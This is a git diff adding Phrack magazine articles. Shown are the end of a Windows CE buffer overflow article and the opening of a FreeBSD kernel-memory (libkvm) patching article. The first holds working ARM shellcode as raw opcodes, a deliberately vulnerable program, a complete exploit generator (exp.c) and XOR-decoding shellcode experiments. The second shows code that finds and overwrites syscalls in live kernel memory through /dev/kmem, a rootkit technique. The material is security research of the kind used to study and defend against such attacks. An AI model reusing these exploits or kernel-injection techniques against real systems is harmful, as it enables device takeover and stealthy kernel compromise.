+.text:01F7508C                 MOVNE   PC, R0
+.text:01F75090                 LDMFD   SP!, {R4,R5,PC}
+.text:01F75090 ; End of function PowerOffSystem
+
+Debugging into this API, we found the system will check the KTHRDINFO
+first. This value was initialized in the MDCreateMainThread2 function of
+PRIVATE\WINCEOS\COREOS\NK\KERNEL\ARM\mdram.c:
+
+...
+    if (kmode || bAllKMode) {
+        pTh->ctx.Psr = KERNEL_MODE;
+        KTHRDINFO (pTh) |= UTLS_INKMODE;
+    } else {
+        pTh->ctx.Psr = USER_MODE;
+        KTHRDINFO (pTh) &= ~UTLS_INKMODE;
+    }
+...
+
+If the application is in kernel mode, this value will be set with 1,
+otherwise it will be 0. All applications of Pocket PC run in kernel mode,
+so the system follow by "LDRNE   R0, [R4]". In my environment, the R0 got
+0x8004B138 which is the ppfnMethods pointer of SystemAPISets[SH_WIN32],
+and then it flow to "LDRNE   R1, [R0,#0x13C]". Let's look the offset 0x13C
+(0x13C/4=0x4F) and corresponding to the index of Win32Methods defined in
+PRIVATE\WINCEOS\COREOS\NK\KERNEL\kwin32.h:
+
+const PFNVOID Win32Methods[] = {
+...
+    (PFNVOID)SC_PowerOffSystem,             // 79
+...
+};
+
+Well, the R1 got the address of SC_PowerOffSystem which is implemented in
+kernel. The instruction "LDREQ   R1, =0xF000FEC4" has no effect when the
+application run in kernel mode. The address 0xF000FEC4 is system call
+which used by user mode. Some APIs use system call directly, such as
+SetKMode:
+
+.text:01F756C0                 EXPORT SetKMode
+.text:01F756C0 SetKMode
+.text:01F756C0
+.text:01F756C0 var_4           = -4
+.text:01F756C0
+.text:01F756C0                 STR     LR, [SP,#var_4]!
+.text:01F756C4                 LDR     R1, =0xF000FE50
+.text:01F756C8                 MOV     LR, PC
+.text:01F756CC                 MOV     PC, R1
+.text:01F756D0                 LDMFD   SP!, {PC}
+
+Windows CE doesn't use ARM's SWI instruction to implement system call, it
+implements in different way. A system call is made to an invalid address
+in the range 0xf0000000 - 0xf0010000, and this causes a prefetch-abort
+trap, which is handled by PrefetchAbort implemented in armtrap.s.
+PrefetchAbort will check the invalid address first, if it is in trap area
+then using ObjectCall to locate the system call and executed, otherwise
+calling ProcessPrefAbort to deal with the exception.
+
+There is a formula to calculate the system call address:
+
+0xf0010000-(256*apiset+apinr)*4
+
+The api set handles are defined in PUBLIC\COMMON\SDK\INC\kfuncs.h and
+PUBLIC\COMMON\OAK\INC\psyscall.h, and the aipnrs are defined in several
+files, for example SH_WIN32 calls are defined in
+PRIVATE\WINCEOS\COREOS\NK\KERNEL\kwin32.h.
+
+Well, let's calculate the system call of KernelIoControl. The apiset is 0
+and the apinr is 99, so the system call is 0xf0010000-(256*0+99)*4 which
+is 0xF000FE74. The following is the shellcode implemented by system call:
+
+#include "stdafx.h"
+
+int shellcode[] =
+{
+0xE59F0014, // ldr r0, [pc, #20]
+0xE59F4014, // ldr r4, [pc, #20]
+0xE3A01000, // mov r1, #0
+0xE3A02000, // mov r2, #0
+0xE3A03000, // mov r3, #0
+0xE1A0E00F, // mov lr, pc
+0xE1A0F004, // mov pc, r4
+0x0101003C, // IOCTL_HAL_REBOOT
+0xF000FE74, // trap address of KernelIoControl
+};
+
+int WINAPI WinMain( HINSTANCE hInstance,
+                    HINSTANCE hPrevInstance,
+                    LPTSTR    lpCmdLine,
+                    int       nCmdShow)
+{
+    ((void (*)(void)) & shellcode)();
+
+    return 0;
+}
+
+It works fine and we don't need search API addresses.
+
+
+--[ 9 - Windows CE Buffer Overflow Exploitation
+
+The hello.cpp is the demonstration vulnerable program:
+
+// hello.cpp
+//
+
+#include "stdafx.h"
+
+int hello()
+{
+    FILE * binFileH;
+    char binFile[] = "\\binfile";
+    char buf[512];
+
+    if ( (binFileH = fopen(binFile, "rb")) == NULL )
+    {
+        printf("can't open file %s!\n", binFile);
+        return 1;
+    }
+
+    memset(buf, 0, sizeof(buf));
+    fread(buf, sizeof(char), 1024, binFileH);
+
+    printf("%08x %d\n", &buf, strlen(buf));
+    getchar();
+    
+    fclose(binFileH);
+    return 0;
+}
+
+int WINAPI WinMain( HINSTANCE hInstance,
+                    HINSTANCE hPrevInstance,
+                    LPTSTR    lpCmdLine,
+                    int       nCmdShow)
+{
+    hello();
+    return 0;
+}
+
+The hello function has a buffer overflow problem. It reads data from the
+"binfile" of the root directory to stack variable "buf" by fread().
+Because it reads 1KB contents, so if the "binfile" is larger than 512
+bytes, the stack variable "buf" will be overflowed.
+
+The printf and getchar are just for test. They have no effect without
+console.dll in windows direcotry. The console.dll file is come from
+Windows Mobile Developer Power Toys.
+
+ARM assembly language uses bl instruction to call function. Let's look
+into the hello function:
+
+6:    int hello()
+7:    {
+22011000   str       lr, [sp, #-4]!
+22011004   sub       sp, sp, #0x89, 30
+8:        FILE * binFileH;
+9:        char binFile[] = "\\binfile";
+...
+...
+26:   }
+220110C4   add       sp, sp, #0x89, 30
+220110C8   ldmia     sp!, {pc}
+
+"str lr, [sp, #-4]!" is the first instruction of the hello() function. It
+stores the lr register to stack, and the lr register contains the return
+address of hello caller. The second instruction prepairs stack memory for
+local variables. "ldmia sp!, {pc}" is the last instruction of the hello()
+function. It loads the return address of hello caller that stored in the
+stack to the pc register, and then the program will execute into WinMain
+function. So overwriting the lr register that is stored in the stack will
+obtain control when the hello function returned.
+
+The variable's memory address that allocated by program is corresponding
+to the loaded Slot, both stack and heap. The process may be loaded into
+difference Slot at each start time. So the base address always alters. We
+know that the slot 0 is mapped from the current process' slot, so the base
+of its stack address is stable.
+
+The following is the exploit of hello program:
+
+/* exp.c - Windows CE Buffer Overflow Demo
+*
+*  san@xfocus.org
+*/
+#include<stdio.h>
+
+#define NOP 0xE1A01001  /* mov r1, r1     */
+#define LR  0x0002FC50  /* return address */
+
+int shellcode[] =
+{
+0xEB000026,
+0xE3A02004,
+0xEB00003A,
+0xE24DDF89,
+0xE28D0008,
+0xE58D0000,
+0xE3A03002,
+0xE3A02000,
+0xE28F1F56,
+0xE3A0010A,
+0xE1A0E00F,
+0xE518F00C,
+0xE3A00001,
+0xE58D000C,
+0xE3A03004,
+0xE58D3004,
+0xE28D100C,
+0xE58D1000,
+0xE28F1F5F,
+0xE59D0008,
+0xE1A0E00F,
+0xE518F008,
+0xE59D0008,
+0xE1A0E00F,
+0xE518F004,
+0xE28F0C01,
+0xE5900000,
+0xE3A01000,
+0xE3A02000,
+0xE3A03000,
+0xE1A0E00F,
+0xE518F010,
+0xE0D020B2,
+0xE0D130B2,
+0xE3520000,
+0x03530000,
+0x01A0F00E,
+0xE1520003,
+0x0AFFFFF8,
+0xE1A0F00E,
+0xE1A0B00E,
+0xE28F40BC,
+0xE5944000,
+0xE3A05FC9,
+0xE0845005,
+0xE5955000,
+0xE1A06005,
+0xE3A07000,
+0xE5960008,
+0xE28F1F45,
+0xEBFFFFEC,
+0x0596707C,
+0x0596808C,
+0xE0879008,
+0x0A000003,
+0xE5966004,
+0xE3560000,
+0x11560005,
+0x1AFFFFF4,
+0xE1A00007,
+0xE0881007,
+0xE1A0F00B,
+0xE28F8070,
+0xE5914020,
+0xE0844000,
+0xE3A06000,
+0xE4947004,
+0xE0877000,
+0xE3A0A000,
+0xE4D79001,
+0xE3590000,
+0x0A000001,
+0xE089A3EA,
+0xEAFFFFFA,
+0xE5989000,
+0xE15A0009,
+0x12866001,
+0x1AFFFFF3,
+0xE5915024,
+0xE0855000,
+0xE0866006,
+0xE19590B6,
+0xE591501C,
+0xE0855000,
+0xE7959109,
+0xE0899000,
+0xE4889004,
+0xE2522001,
+0x1AFFFFE5,
+0xE1A0F00E,
+0xFFFFC800,
+0x0101003C,
+0x283A9DE7,
+0x0BF7DF51,
+0xD8C0FEC0,
+0x0E511783,
+0x004F0053,
+0x00540046,
+0x00410057,
+0x00450052,
+0x005C005C,
+0x00690057,
+0x00630064,
+0x006D006F,
+0x005C006D,
+0x0042005C,
+0x00430074,
+0x006E006F,
+0x00690066,
+0x005C0067,
+0x0047005C,
+0x006E0065,
+0x00720065,
+0x006C0061,
+0x00000000,
+0x00740053,
+0x00630061,
+0x004D006B,
+0x0064006F,
+0x00000065,
+0x006F0063,
+0x00650072,
+0x006C0064,
+0x002E006C,
+0x006C0064,
+0x0000006C,
+};
+
+/* prints a long to a string */
+char* put_long(char* ptr, long value)
+{
+    *ptr++ = (char) (value >> 0) & 0xff;
+    *ptr++ = (char) (value >> 8) & 0xff;
+    *ptr++ = (char) (value >> 16) & 0xff;
+    *ptr++ = (char) (value >> 24) & 0xff;
+
+    return ptr;
+}
+
+int main()
+{
+    FILE * binFileH;
+    char binFile[] = "binfile";
+    char buf[544];
+    char *ptr;
+    int  i;
+
+    if ( (binFileH = fopen(binFile, "wb")) == NULL )
+    {
+        printf("can't create file %s!\n", binFile);
+        return 1;
+    }
+
+    memset(buf, 0, sizeof(buf)-1);
+    ptr = buf;
+
+    for (i = 0; i < 4; i++) {
+        ptr = put_long(ptr, NOP);
+    }
+    memcpy(buf+16, shellcode, sizeof(shellcode));
+    put_long(ptr-16+540, LR);
+
+    fwrite(buf, sizeof(char), 544, binFileH);
+    fclose(binFileH);
+}
+
+We choose a stack address of slot 0, and it points to our shellcode. It
+will overwrite the return address that stored in the stack. We can also
+use a jump address of virtual memory space of the process instead of. This
+exploit produces a "binfile" that will overflow the "buf" variable and the
+return address that stored in the stack.
+
+After the binfile copied to the PDA, the PDA restarts and open the
+bluetooth when the hello program is executed. That's means the hello
+program flowed to our shellcode.
+
+While I changed another method to construct the exploit string, its as
+following:
+
+pad...pad|return address|nop...nop...shellcode
+
+And the exploit produces a 1KB "binfile". But the PDA is freeze when the
+hello program is executed. It was confused, I think maybe the stack of
+Windows CE is small and the overflow string destroyed the 2KB guard on the
+top of stack. It is freeze when the program call a API after overflow
+occurred. So, we must notice the features of stack while writing exploit
+for Windows CE.
+
+EVC has some bugs that make debug difficult. First, EVC will write some
+arbitrary data to the stack contents when the stack releases at the end of
+function, so the shellcode maybe modified. Second, the instruction at
+breakpoint maybe change to 0xE6000010 in EVC while debugging. Another bug
+is funny, the debugger without error while writing data to a .text address
+by step execute, but it will capture a access violate exception by execute
+directly.
+
+
+--[ 10 - About Decoding Shellcode
+
+The shellcode we talked above is a concept shellcode which contains lots
+of zeros. It executed correctly in this demonstrate program, but some other
+vulnerable programs maybe filter the special characters before buffer
+overflow in some situations. For example overflowed by strcpy, the
+shellcode will be cut by the zero.
+
+It is difficult and inconvenient to write a shellcode without special
+characters by API search method. So we think about the decoding shellcode.
+Decoding shellcode will convert the special characters to fit characters
+and make the real shellcode more universal.
+
+The newer ARM processor(such as arm9 and arm10) has a Harvard architecture
+which separates instruction cache and data cache. This feature will
+improve the performance of processor, and most of RISC processors have
+this feature. But the self-modifying code is not easy to implement,
+because it will puzzled by the caches and the processor implementation
+after being modified.
+
+Let's look at the following code first:
+
+#include "stdafx.h"
+
+int weird[] =
+{
+0xE3A01099, // mov       r1, #0x99
+
+0xE5CF1020, // strb      r1, [pc, #0x20]
+0xE5CF1020, // strb      r1, [pc, #0x20]
+0xE5CF1020, // strb      r1, [pc, #0x20]
+0xE5CF1020, // strb      r1, [pc, #0x20]
+
+0xE1A01001, // mov       r1, r1 ; pad
+0xE1A01001,
+0xE1A01001,
+0xE1A01001,
+0xE1A01001,
+0xE1A01001,
+
+0xE3A04001, // mov       r4, #0x1
+0xE3A03001, // mov       r3, #0x1
+0xE3A02001, // mov       r2, #0x1
+0xE3A01001, // mov       r1, #0x1
+0xE6000010, // breakpoint
+};
+
+int WINAPI WinMain( HINSTANCE hInstance,
+                    HINSTANCE hPrevInstance,
+                    LPTSTR    lpCmdLine,
+                    int       nCmdShow)
+{
+    ((void (*)(void)) & weird)();
+
+    return 0;
+}
+
+That four strb instructions will change the immediate value of the below
+mov instructions to 0x99. It will break at that inserted breakpoint while
+executing this code in EVC debugger directly. The r1-r4 registers got 0x99
+in S3C2410 which is a arm9 core processor. It needs more nop instructions
+to pad after modified to let the r1-r4 got 0x99 while I tested this code
+in my friend's PDA which has a Intel Xscale processor. I think the reason
+maybe is that the arm9 has 5 pipelines and the arm10 has 6 pipelines. Well
+, I changed it to another method:
+
+0xE28F3053, // add       r3, pc, #0x53
+
+0xE3A01010, // mov       r1, #0x10
+0xE7D32001, // ldrb      r2, [r3, +r1]
+0xE2222088, // eor       r2, r2, #0x88
+0xE7C32001, // strb      r2, [r3, +r1]
+0xE2511001, // subs      r1, r1, #1
+0x1AFFFFFA, // bne       28011008
+
+//0xE1A0100F, // mov       r1, pc
+//0xE3A02020, // mov       r2, #0x20
+//0xE3A03D05, // mov       r3, #5, 26
+//0xEE071F3A, // mcr       p15, 0, r1, c7, c10, 1 ; clean and invalidate each entry
+//0xE0811002, // add       r1, r1, r2
+//0xE0533002, // subs      r3, r3, r2
+//0xCAFFFFFB, // bgt       |weird+28h (30013058)|
+//0xE0211001, // eor       r1, r1, r1
+//0xEE071F9A, // mcr       p15, 0, r1, c7, c10, 4 ; drain write buffer
+//0xEE071F15, // mcr       p15, 0, r1, c7, c5, 0  ; flush the icache
+0xE1A01001, // mov       r1, r1 ; pad
+0xE1A01001,
+0xE1A01001,
+0xE1A01001,
+0xE1A01001,
+0xE1A01001,
+0xE1A01001,
+0xE1A01001,
+0xE1A01001,
+0xE1A01001,
+0xE1A01001,
+0xE1A01001,
+0xE1A01001,
+0xE1A01001,
+0xE1A01001,
+0xE1A01001,
+
+0x6B28C889, // mov       r4, #0x1 ; encoded
+0x6B28B889, // mov       r3, #0x1
+0x6B28A889, // mov       r2, #0x1
+0x6B289889, // mov       r1, #0x1
+0xE6000010, // breakpoint
+
+The four mov instructions were encoded by Exclusive-OR with 0x88, the
+decoder has a loop to load a encoded byte and Exclusive-OR it with 0x88
+and then stored it to the original position. The r1-r4 registers won't get
+0x1 even you put a lot of pad instructions after decoded in both arm9 and
+arm10 processors. I think maybe that the load instruction bring on a cache
+problem.
+
+ARM Architecture Reference Manual has a chapter to introduce how to deal
+with self-modifying code. It says the caches will be flushed by an
+operating system call. Phil, the guy from 0dd shared his experience to me.
+He said he's used this method successful on ARM system(I think his
+environment maybe is Linux). Well, this method is successful on AIX PowerPC
+and Solaris SPARC too(I've tested it). But SWI implements in a different
+way under Windows CE. The armtrap.s contains implementation of SWIHandler
+which does nothing except 'movs pc,lr'. So it has no effect after decode
+finished.
+
+Because Pocket PC's applications run in kernel mode, so we have privilege
+to access the system control coprocessor. ARM Architecture Reference
+Manual introduces memory system and how to handle cache via the system
+control coprocessor. After looked into this manual, I tried to disable the
+instruction cache before decode:
+
+mrc     p15, 0, r1, c1, c0, 0
+bic     r1, r1, #0x1000
+mcr     p15, 0, r1, c1, c0, 0
+
+But the system freezed when the mcr instruction executed. Then I tried to
+invalidate entire instruction cache after decoded:
+
+eor     r1, r1, r1
+mcr     p15, 0, r1, c7, c5, 0
+
+But it has no effect too.
+
+
+--[ 11 - Conclusion
+
+The codes talked above are the real-life buffer overflow example on
+Windows CE. It is not perfect, but I think this technology will be improved
+in the future.
+
+Because of the cache mechanism, the decoding shellcode is not good enough.
+
+Internet and handset devices are growing quickly, so threats to the PDAs
+and mobiles become more and more serious. And the patch of Windows CE is
+more difficult and dangerous than the normal Windows system to customers.
+Because the entire Windows CE system is stored in the ROM, if you want to
+patch the system flaws, you must flush the ROM, And the ROM images of
+various vendors or modes of PDAs and mobiles aren't compatible.
+
+
+--[ 12 - Greetings
+
+Special greets to the dudes of XFocus Team, my girlfriend, the life will
+fade without you.
+Special thanks to the Research Department of NSFocus Corporation, I love
+this team.
+And I'll show my appreciation to 0dd members, Nasiry and Flier too, the
+discussions with them were nice.
+
+
+--[ 13 - References
+
+[1] ARM Architecture Reference Manual
+    http://www.arm.com
+[2] Windows CE 4.2 Source Code
+    http://msdn.microsoft.com/embedded/windowsce/default.aspx
+[3] Details Emerge on the First Windows Mobile Virus
+    - Cyrus Peikari, Seth Fogie, Ratter/29A
+    http://www.informit.com/articles/article.asp?p=337071
+[4] Pocket PC Abuse - Seth Fogie
+    http://www.blackhat.com/presentations/bh-usa-04/bh-us-04-fogie/bh-us-04-fogie-up.pdf
+[5] misc notes on the xda and windows ce
+    http://www.xs4all.nl/~itsme/projects/xda/
+[6] Introduction to Windows CE
+    http://www.cs-ipv6.lancs.ac.uk/acsp/WinCE/Slides/
+[7] Nasiry 's way
+    http://www.cnblogs.com/nasiry/
+[8] Programming Windows CE Second Edition - Doug Boling
+[9] Win32 Assembly Components
+    http://LSD-PL.NET
+
+|=[ EOF ]=--------------------------------------------------------------=|
diff --git a/phrack63/7.txt b/phrack63/7.txt
new file mode 100644
index 0000000..e49b5d4
--- /dev/null
+++ b/phrack63/7.txt
@@ -0,0 +1,1730 @@
+                           ==Phrack Inc.==
+
+              Volume 0x0b, Issue 0x3f, Phile #0x07 of 0x14
+
+|=-------=[ Playing Games With Kernel Memory ... FreeBSD Style ]=--------=|
+|=-----------------------------------------------------------------------=|
+|=-----------------=[ Joseph Kong <jkong01@gmail.com> ]=-----------------=|
+|=--------------------------=[ July 8, 2005 ]=---------------------------=|
+
+
+--[ Contents
+
+
+  1.0 - Introduction
+
+  2.0 - Finding System Calls
+
+  3.0 - Understanding Call Statements And Bytecode Injection
+
+  4.0 - Allocating Kernel Memory
+
+  5.0 - Putting It All Together
+
+  6.0 - Concluding Remarks
+
+  7.0 - References
+
+
+
+
+--[ 1.0 - Introduction
+
+    The kernel memory interface or kvm interface was first introduced in
+SunOS. Although it has been around for quite some time, many people still
+consider it to be rather obscure. This article documents the basic usage
+of the Kernel Data Access Library (libkvm), and will explore some ways to
+use libkvm (/dev/kmem) in order to alter the behavior of a running FreeBSD
+system.
+
+    FreeBSD kernel hacking skills of a moderate level (i.e. you know how to
+use ddb), as well as a decent understanding of C and x86 Assembly (AT&T
+Syntax) are required in order to understand the contents of this article.
+
+    This article was written from the perspective of a FreeBSD 5.4 Stable
+System.
+
+Note: Although the techniques described in this article have been explored
+in other articles (see References), they are always from a Linux or Windows
+perspective. I personally only know of one other text that touches on the
+information contained herein. That text entitled "Fun and Games with
+FreeBSD Kernel Modules" by Stephanie Wehner explained some of the things
+one can do with libkvm. Considering the fact that one can do much more,
+and that documentation regarding libkvm is scarce (man pages and source
+code aside), I decided to write this article.
+
+
+--[ 2.0 - Finding System Calls
+
+Note: This section is extremely basic, if you have a good grasp of the
+libkvm functions read the next paragraph and skip to the next section.
+
+    Stephanie Wehner wrote a program called checkcall, which would check if
+sysent[CALL] had been tampered with, and if so would change it back to the
+original function. In order to help with the debugging during the latter
+sections of this article, we are going to make use of checkcall's find
+system call functionality. Following is a stripped down version of
+checkcall, with just the find system call function. It is also a good
+example to learn the basics of libkvm from. A line by line explanation of
+the libkvm functions appears after the source code listing.
+
+find_syscall.c:
+
+/*
+ * Takes two arguments: the name of a syscall and corresponding number,
+ * and reports the location in memory where the syscall is located.
+ *
+ * If you enter the name of a syscall with an incorrect syscall number,
+ * the output will be fubar. Too lazy to implement a check
+ *
+ * Based off of Stephanie Wehner's checkcall.c,v 1.1.1.1
+ *
+ * find_syscall.c,v 1.0 2005/05/20
+ */
+
+
+#include <stdio.h>
+#include <fcntl.h>
+#include <kvm.h>
+#include <nlist.h>
+#include <limits.h>
+#include <sys/types.h>
+#include <sys/sysent.h>
+#include <sys/syscall.h>
+
+int main(int argc, char *argv[]) {
+
+	char errbuf[_POSIX2_LINE_MAX];
+	kvm_t *kd;
+	u_int32_t addr;
+	int callnum;
+	struct sysent call;
+	struct nlist nl[] = { { NULL }, { NULL }, { NULL }, };
+
+
+	/* Check for the correct number of arguments */
+
+	if(argc != 3) {
+		printf("Usage:\n%s <name of system call> <syscall number>"
+		       " \n\n", argv[0]);
+
+		printf("See /usr/src/sys/sys/syscall.h for syscall numbers"
+		       " \n");
+
+		exit(0);
+	}
+
+
+	/* Find the syscall */
+
+	nl[0].n_name = "sysent";
+	nl[1].n_name = argv[1];
+	callnum = atoi(argv[2]);
+
+	printf("Finding syscall %d: %s\n\n", callnum, argv[1]);
+
+	/* Initialize kernel virtual memory access */
+
+	kd = kvm_openfiles(NULL, NULL, NULL, O_RDWR, errbuf);
+	if(kd == NULL) {
+		fprintf(stderr, "ERROR: %s\n", errbuf);
+		exit(-1);
+	}
+
+	/* Find the addresses  */
+
+	if(kvm_nlist(kd, nl) < 0) {
+		fprintf(stderr, "ERROR: %s\n", kvm_geterr(kd));
+		exit(-1);
+	}
+
+	if(!nl[0].n_value) {
+		fprintf(stderr, "ERROR: %s not found (fubar?)\n"
+			, nl[0].n_name);
+		exit(-1);
+	}
+	else {
+		printf("%s is 0x%x at 0x%x\n", nl[0].n_name, nl[0].n_type
+		       , nl[0].n_value);
+	}
+
+	if(!nl[1].n_value) {
+		fprintf(stderr, "ERROR: %s not found\n", nl[1].n_name);
+		exit(-1);
+	}
+
+
+	/* Calculate the address */
+
+	addr = nl[0].n_value + callnum * sizeof(struct sysent);
+
+
+	/* Print out location */
+
+	if(kvm_read(kd, addr, &call, sizeof(struct sysent)) < 0) {
+		fprintf(stderr, "ERROR: %s\n", kvm_geterr(kd));
+		exit(-1);
+	}
+	else {
+		printf("sysent[%d] is at 0x%x and will execute function"
+		       " located at 0x%x\n", callnum, addr, call.sy_call);
+	}
+
+	if(kvm_close(kd) < 0) {
+		fprintf(stderr, "ERROR: %s\n", kvm_geterr(kd));
+		exit(-1);
+	}
+
+	exit(0);
+}
+
+   There are five functions from libkvm that are included in the above
+program; they are:
+
+	kvm_openfiles
+	kvm_nlist
+	kvm_geterr
+	kvm_read
+	kvm_close
+
+kvm_openfiles:
+
+    Basically kvm_openfiles initializes kernel virtual memory access, and
+returns a descriptor to be used in subsequent kvm library calls. In
+find_syscall the syntax was as follows:
+
+	kd = kvm_openfiles(NULL, NULL, NULL, O_RDWR, errbuf);
+
+    kd is used to store the returned descriptor, if after the call kd 
+equals NULL then an error has occurred.
+
+    The first three arguments correspond to const char *execfile, const 
+char *corefile, and const char *swapfiles respectively. However for our 
+purposes they are unnecessary, hence NULL. The fourth argument indicates 
+that we want read/write access. The fifth argument indicates which buffer 
+to place any error messages, more on that later.
+
+kvm_nlist:
+
+    The man page states that kvm_nlist retrieves the symbol table entries
+indicated by the name list argument (struct nlist). The members of struct
+nlist that interest us are as follows:
+
+	char *n_name;		/* symbol name (in memory) */
+	unsigned long n_value;	/* address of the symbol   */
+
+    Prior to calling kvm_nlist in find_syscall a struct nlist array was 
+setup as follows:
+
+	struct nlist nl[] = { { NULL }, { NULL }, { NULL }, };
+	nl[0].n_name = "sysent";
+	nl[1].n_name = argv[1];
+
+    The syntax for calling kvm_nlist is as follows:
+
+	kvm_nlist(kd, nl)
+
+    What this did was fill out the n_value member of each element in the 
+array nl with the starting address in memory corresponding to the value in
+n_name. In other words we now know the location in memory of sysent and the
+user supplied syscall (argv[1]). nl was initialized with three elements
+because kvm_nlist expects as its second argument a NULL terminated array of
+nlist structures.
+
+kvm_geterr:
+
+    As stated in the man page this function returns a string describing the
+most recent error condition. If you look through the above source code
+listing you will see kvm_geterr gets called after every libkvm function,
+except kvm_openfiles. kvm_openfiles uses its own unique form of error
+reporting, because kvm_geterr requires a descriptor as an argument, which
+would not exist if kvm_openfiles has not been called yet. An example usage
+of kvm_geterr follows:
+
+	fprintf(stderr, "ERROR: %s\n", kvm_geterr(kd));
+
+kvm_read:
+
+    This function is used to read kernel virtual memory. In find_syscall 
+the syntax was as follows:
+
+	kvm_read(kd, addr, &call, sizeof(struct sysent))
+
+    The first argument is the descriptor. The second is the address to 
+begin reading from. The third argument is the user-space location to store
+the data read. The fourth argument is the number of bytes to read.
+
+kvm_close:
+
+    This function breaks the connection between the pointer and the kernel
+virtual memory established with kvm_openfiles. In find_syscall this
+function was called as follows:
+
+	kvm_close(kd)
+
+The following is an algorithmic explanation of find_syscall.c:
+
+	1. Check to make sure the user has supplied a syscall name and
+	   number. (No error checking, just checks for two arguments)
+	2. Setup the array of nlist structures appropriately.
+	3. Initialize kernel virtual memory access. (kvm_openfiles)
+	4. Find the address of sysent and the user supplied syscall.
+	   (kvm_nlist)
+	5. Calculate the location of the syscall in sysent.
+	6. Copy the syscall's sysent structure from kernel-space to
+	   user-space. (kvm_read)
+	7. Print out the location of the syscall in the sysent structure
+	   and the location of the executed function.
+	8. Close the descriptor (kvm_close)
+
+    In order to verify that the output of find_syscall is accurate, one can
+make use of ddb as follows:
+
+Note: The output below was modified in order to meet the 75 character per
+line requirement.
+
+	[---------------------------------------------------------]
+
+ghost@slavetwo:~#ls
+find_syscall.c
+ghost@slavetwo:~#gcc -o find_syscall find_syscall.c -lkvm
+ghost@slavetwo:~#ls
+find_syscall   find_syscall.c
+ghost@slavetwo:~#sudo ./find_syscall
+Password:
+Usage:
+./find_syscall <name of system call> <syscall number>
+
+See /usr/src/sys/sys/syscall.h for syscall numbers
+ghost@slavetwo:~#sudo ./find_syscall mkdir 136
+Finding syscall 136: mkdir
+
+sysent is 0x4 at 0xc06dc840
+sysent[136] is at 0xc06dcc80 and will execute function located at
+0xc0541900
+ghost@slavetwo:~#KDB: enter: manual escape to debugger
+[thread pid 12 tid 100004 ]
+Stopped at      kdb_enter+0x32: leave
+db> examine/i 0xc0541900
+mkdir:  pushl   %ebp
+db>
+mkdir+0x1:      movl    %esp,%ebp
+db> c
+
+ghost@slavetwo:~#
+
+	[---------------------------------------------------------]
+
+
+--[ 3.0 - Understanding Call Statements And Bytecode Injection
+
+    In x86 Assembly a Call statement is a control transfer instruction, 
+used to call a procedure. There are two types of Call statements Near and 
+Far, for the purposes of this article one only needs to understand a Near 
+Call. The following code illustrates the details of a Near Call statement 
+(in Intel Syntax):
+
+	0200	BB1295	MOV BX,9512
+	0203	E8FA00	CALL 0300
+	0206	B82F14	MOV AX,142F
+
+    In the above code snippet, when the IP (Instruction Pointer) gets to 
+0203 it will jump to 0300. The hexadecimal representation for CALL is E8,
+however FA00 is not 0300. 0x300 - 0x206 = 0xFA. In a near call the IP
+address of the instruction after the Call is saved on the stack, so the
+called procedure knows where to return to. This explains why the operand
+for Call in this example is 0xFA00 and not 0x300. This is an important
+point and will come into play later.
+
+    One of the more entertaining things one can do with the libkvm 
+functions is patch kernel virtual memory. As always we start with a very 
+simple example ... Hello World! The following is a kld which adds a 
+syscall that functions as a Hello World! program.
+
+hello.c:
+
+/*
+ * Prints "FreeBSD Rox!" 10 times
+ *
+ */
+
+#include <sys/types.h>
+#include <sys/param.h>
+#include <sys/proc.h>
+#include <sys/module.h>
+#include <sys/sysent.h>
+#include <sys/kernel.h>
+#include <sys/systm.h>
+
+/*
+ * The function for implementing the syscall.
+ */
+
+static int
+hello (struct thread *td, void *arg)
+{
+	printf ("FreeBSD Rox!\n");
+	printf ("FreeBSD Rox!\n");
+	printf ("FreeBSD Rox!\n");
+	printf ("FreeBSD Rox!\n");
+	printf ("FreeBSD Rox!\n");
+	printf ("FreeBSD Rox!\n");
+	printf ("FreeBSD Rox!\n");
+	printf ("FreeBSD Rox!\n");
+	printf ("FreeBSD Rox!\n");
+	printf ("FreeBSD Rox!\n");
+	return 0;
+}
+
+/*
+ * The `sysent' for the new syscall
+ */
+
+static struct sysent hello_sysent = {
+	0,			/* sy_narg */
+	hello			/* sy_call */
+};
+
+/*
+ * The offset in sysent where the syscall is allocated.
+ */
+
+static int offset = 210;
+
+/*
+ * The function called at load/unload.
+ */
+
+static int
+load (struct module *module, int cmd, void *arg)
+{
+	int error = 0;
+
+	switch (cmd) {
+	case MOD_LOAD :
+		printf ("syscall loaded at %d\n", offset);
+		break;
+	case MOD_UNLOAD :
+		printf ("syscall unloaded from %d\n", offset);
+		break;
+	default :
+		error = EOPNOTSUPP;
+		break;
+	}
+	return error;
+}
+
+SYSCALL_MODULE(hello, &offset, &hello_sysent, load, NULL);
+
+The following is the user-space program for the above kld:
+
+interface.c:
+
+#include <stdio.h>
+#include <sys/syscall.h>
+#include <sys/types.h>
+#include <sys/module.h>
+
+int main(int argc, char **argv) {
+
+        return syscall(210);
+}
+
+    If we compile the above kld using a standard Makefile, load it, and 
+then run the user-space program, we get some very annoying output. In order
+to make this syscall less annoying we can use the following program. As 
+before an explanation of any new functions and concepts appears after the 
+source code listing.
+
+test_call.c:
+
+/*
+ * Test understanding of call statement:
+ * Operand for call statement is the difference between the called function
+ * and the address of the instruction following the call statement.
+ *
+ * Tested on syscall hello. Normally prints out "FreeBSD Rox!" 10 times,
+ * after patching only prints it out once.
+ *
+ * test_call.c,v 2.1 2005/06/15
+ */
+
+
+#include <stdio.h>
+#include <fcntl.h>
+#include <kvm.h>
+#include <nlist.h>
+#include <limits.h>
+#include <sys/types.h>
+
+/*
+ * Offset of string to be printed
+ * Starting at the beginning of the syscall hello
+ */
+
+#define OFFSET_1	0xed
+
+/*
+ * Offset of instruction following call statement
+ */
+
+#define OFFSET_2	0x12
+
+/*
+ * Replacement code
+ */
+
+unsigned char code[] =
+	"\x55"				/* push  %ebp			*/
+	"\x89\xe5"			/* mov   %esp,%ebp		*/
+	"\x83\xec\x04"			/* sub   $0x4,%esp		*/
+	"\xc7\x04\x24\x00\x00\x00\x00"	/* movl  $0,(%esp)		*/
+	"\xe8\x00\x00\x00\x00"		/* call  printf			*/
+	"\xc9"				/* leave			*/
+	"\x31\xc0"			/* xor   %eax,%eax		*/
+	"\xc3"				/* ret				*/
+	"\x8d\xb4\x26\x00\x00\x00\x00"	/* lea   0x0(%esi),%esi		*/
+	"\x8d\xbc\x27\x00\x00\x00\x00";	/* lea   0x0(%edi),%edi		*/
+
+
+int main(int argc, char *argv[]) {
+
+	char errbuf[_POSIX2_LINE_MAX];
+	kvm_t *kd;
+	u_int32_t offset_1;
+	u_int32_t offset_2;
+	struct nlist nl[] = { { NULL }, { NULL }, { NULL }, };
+
+
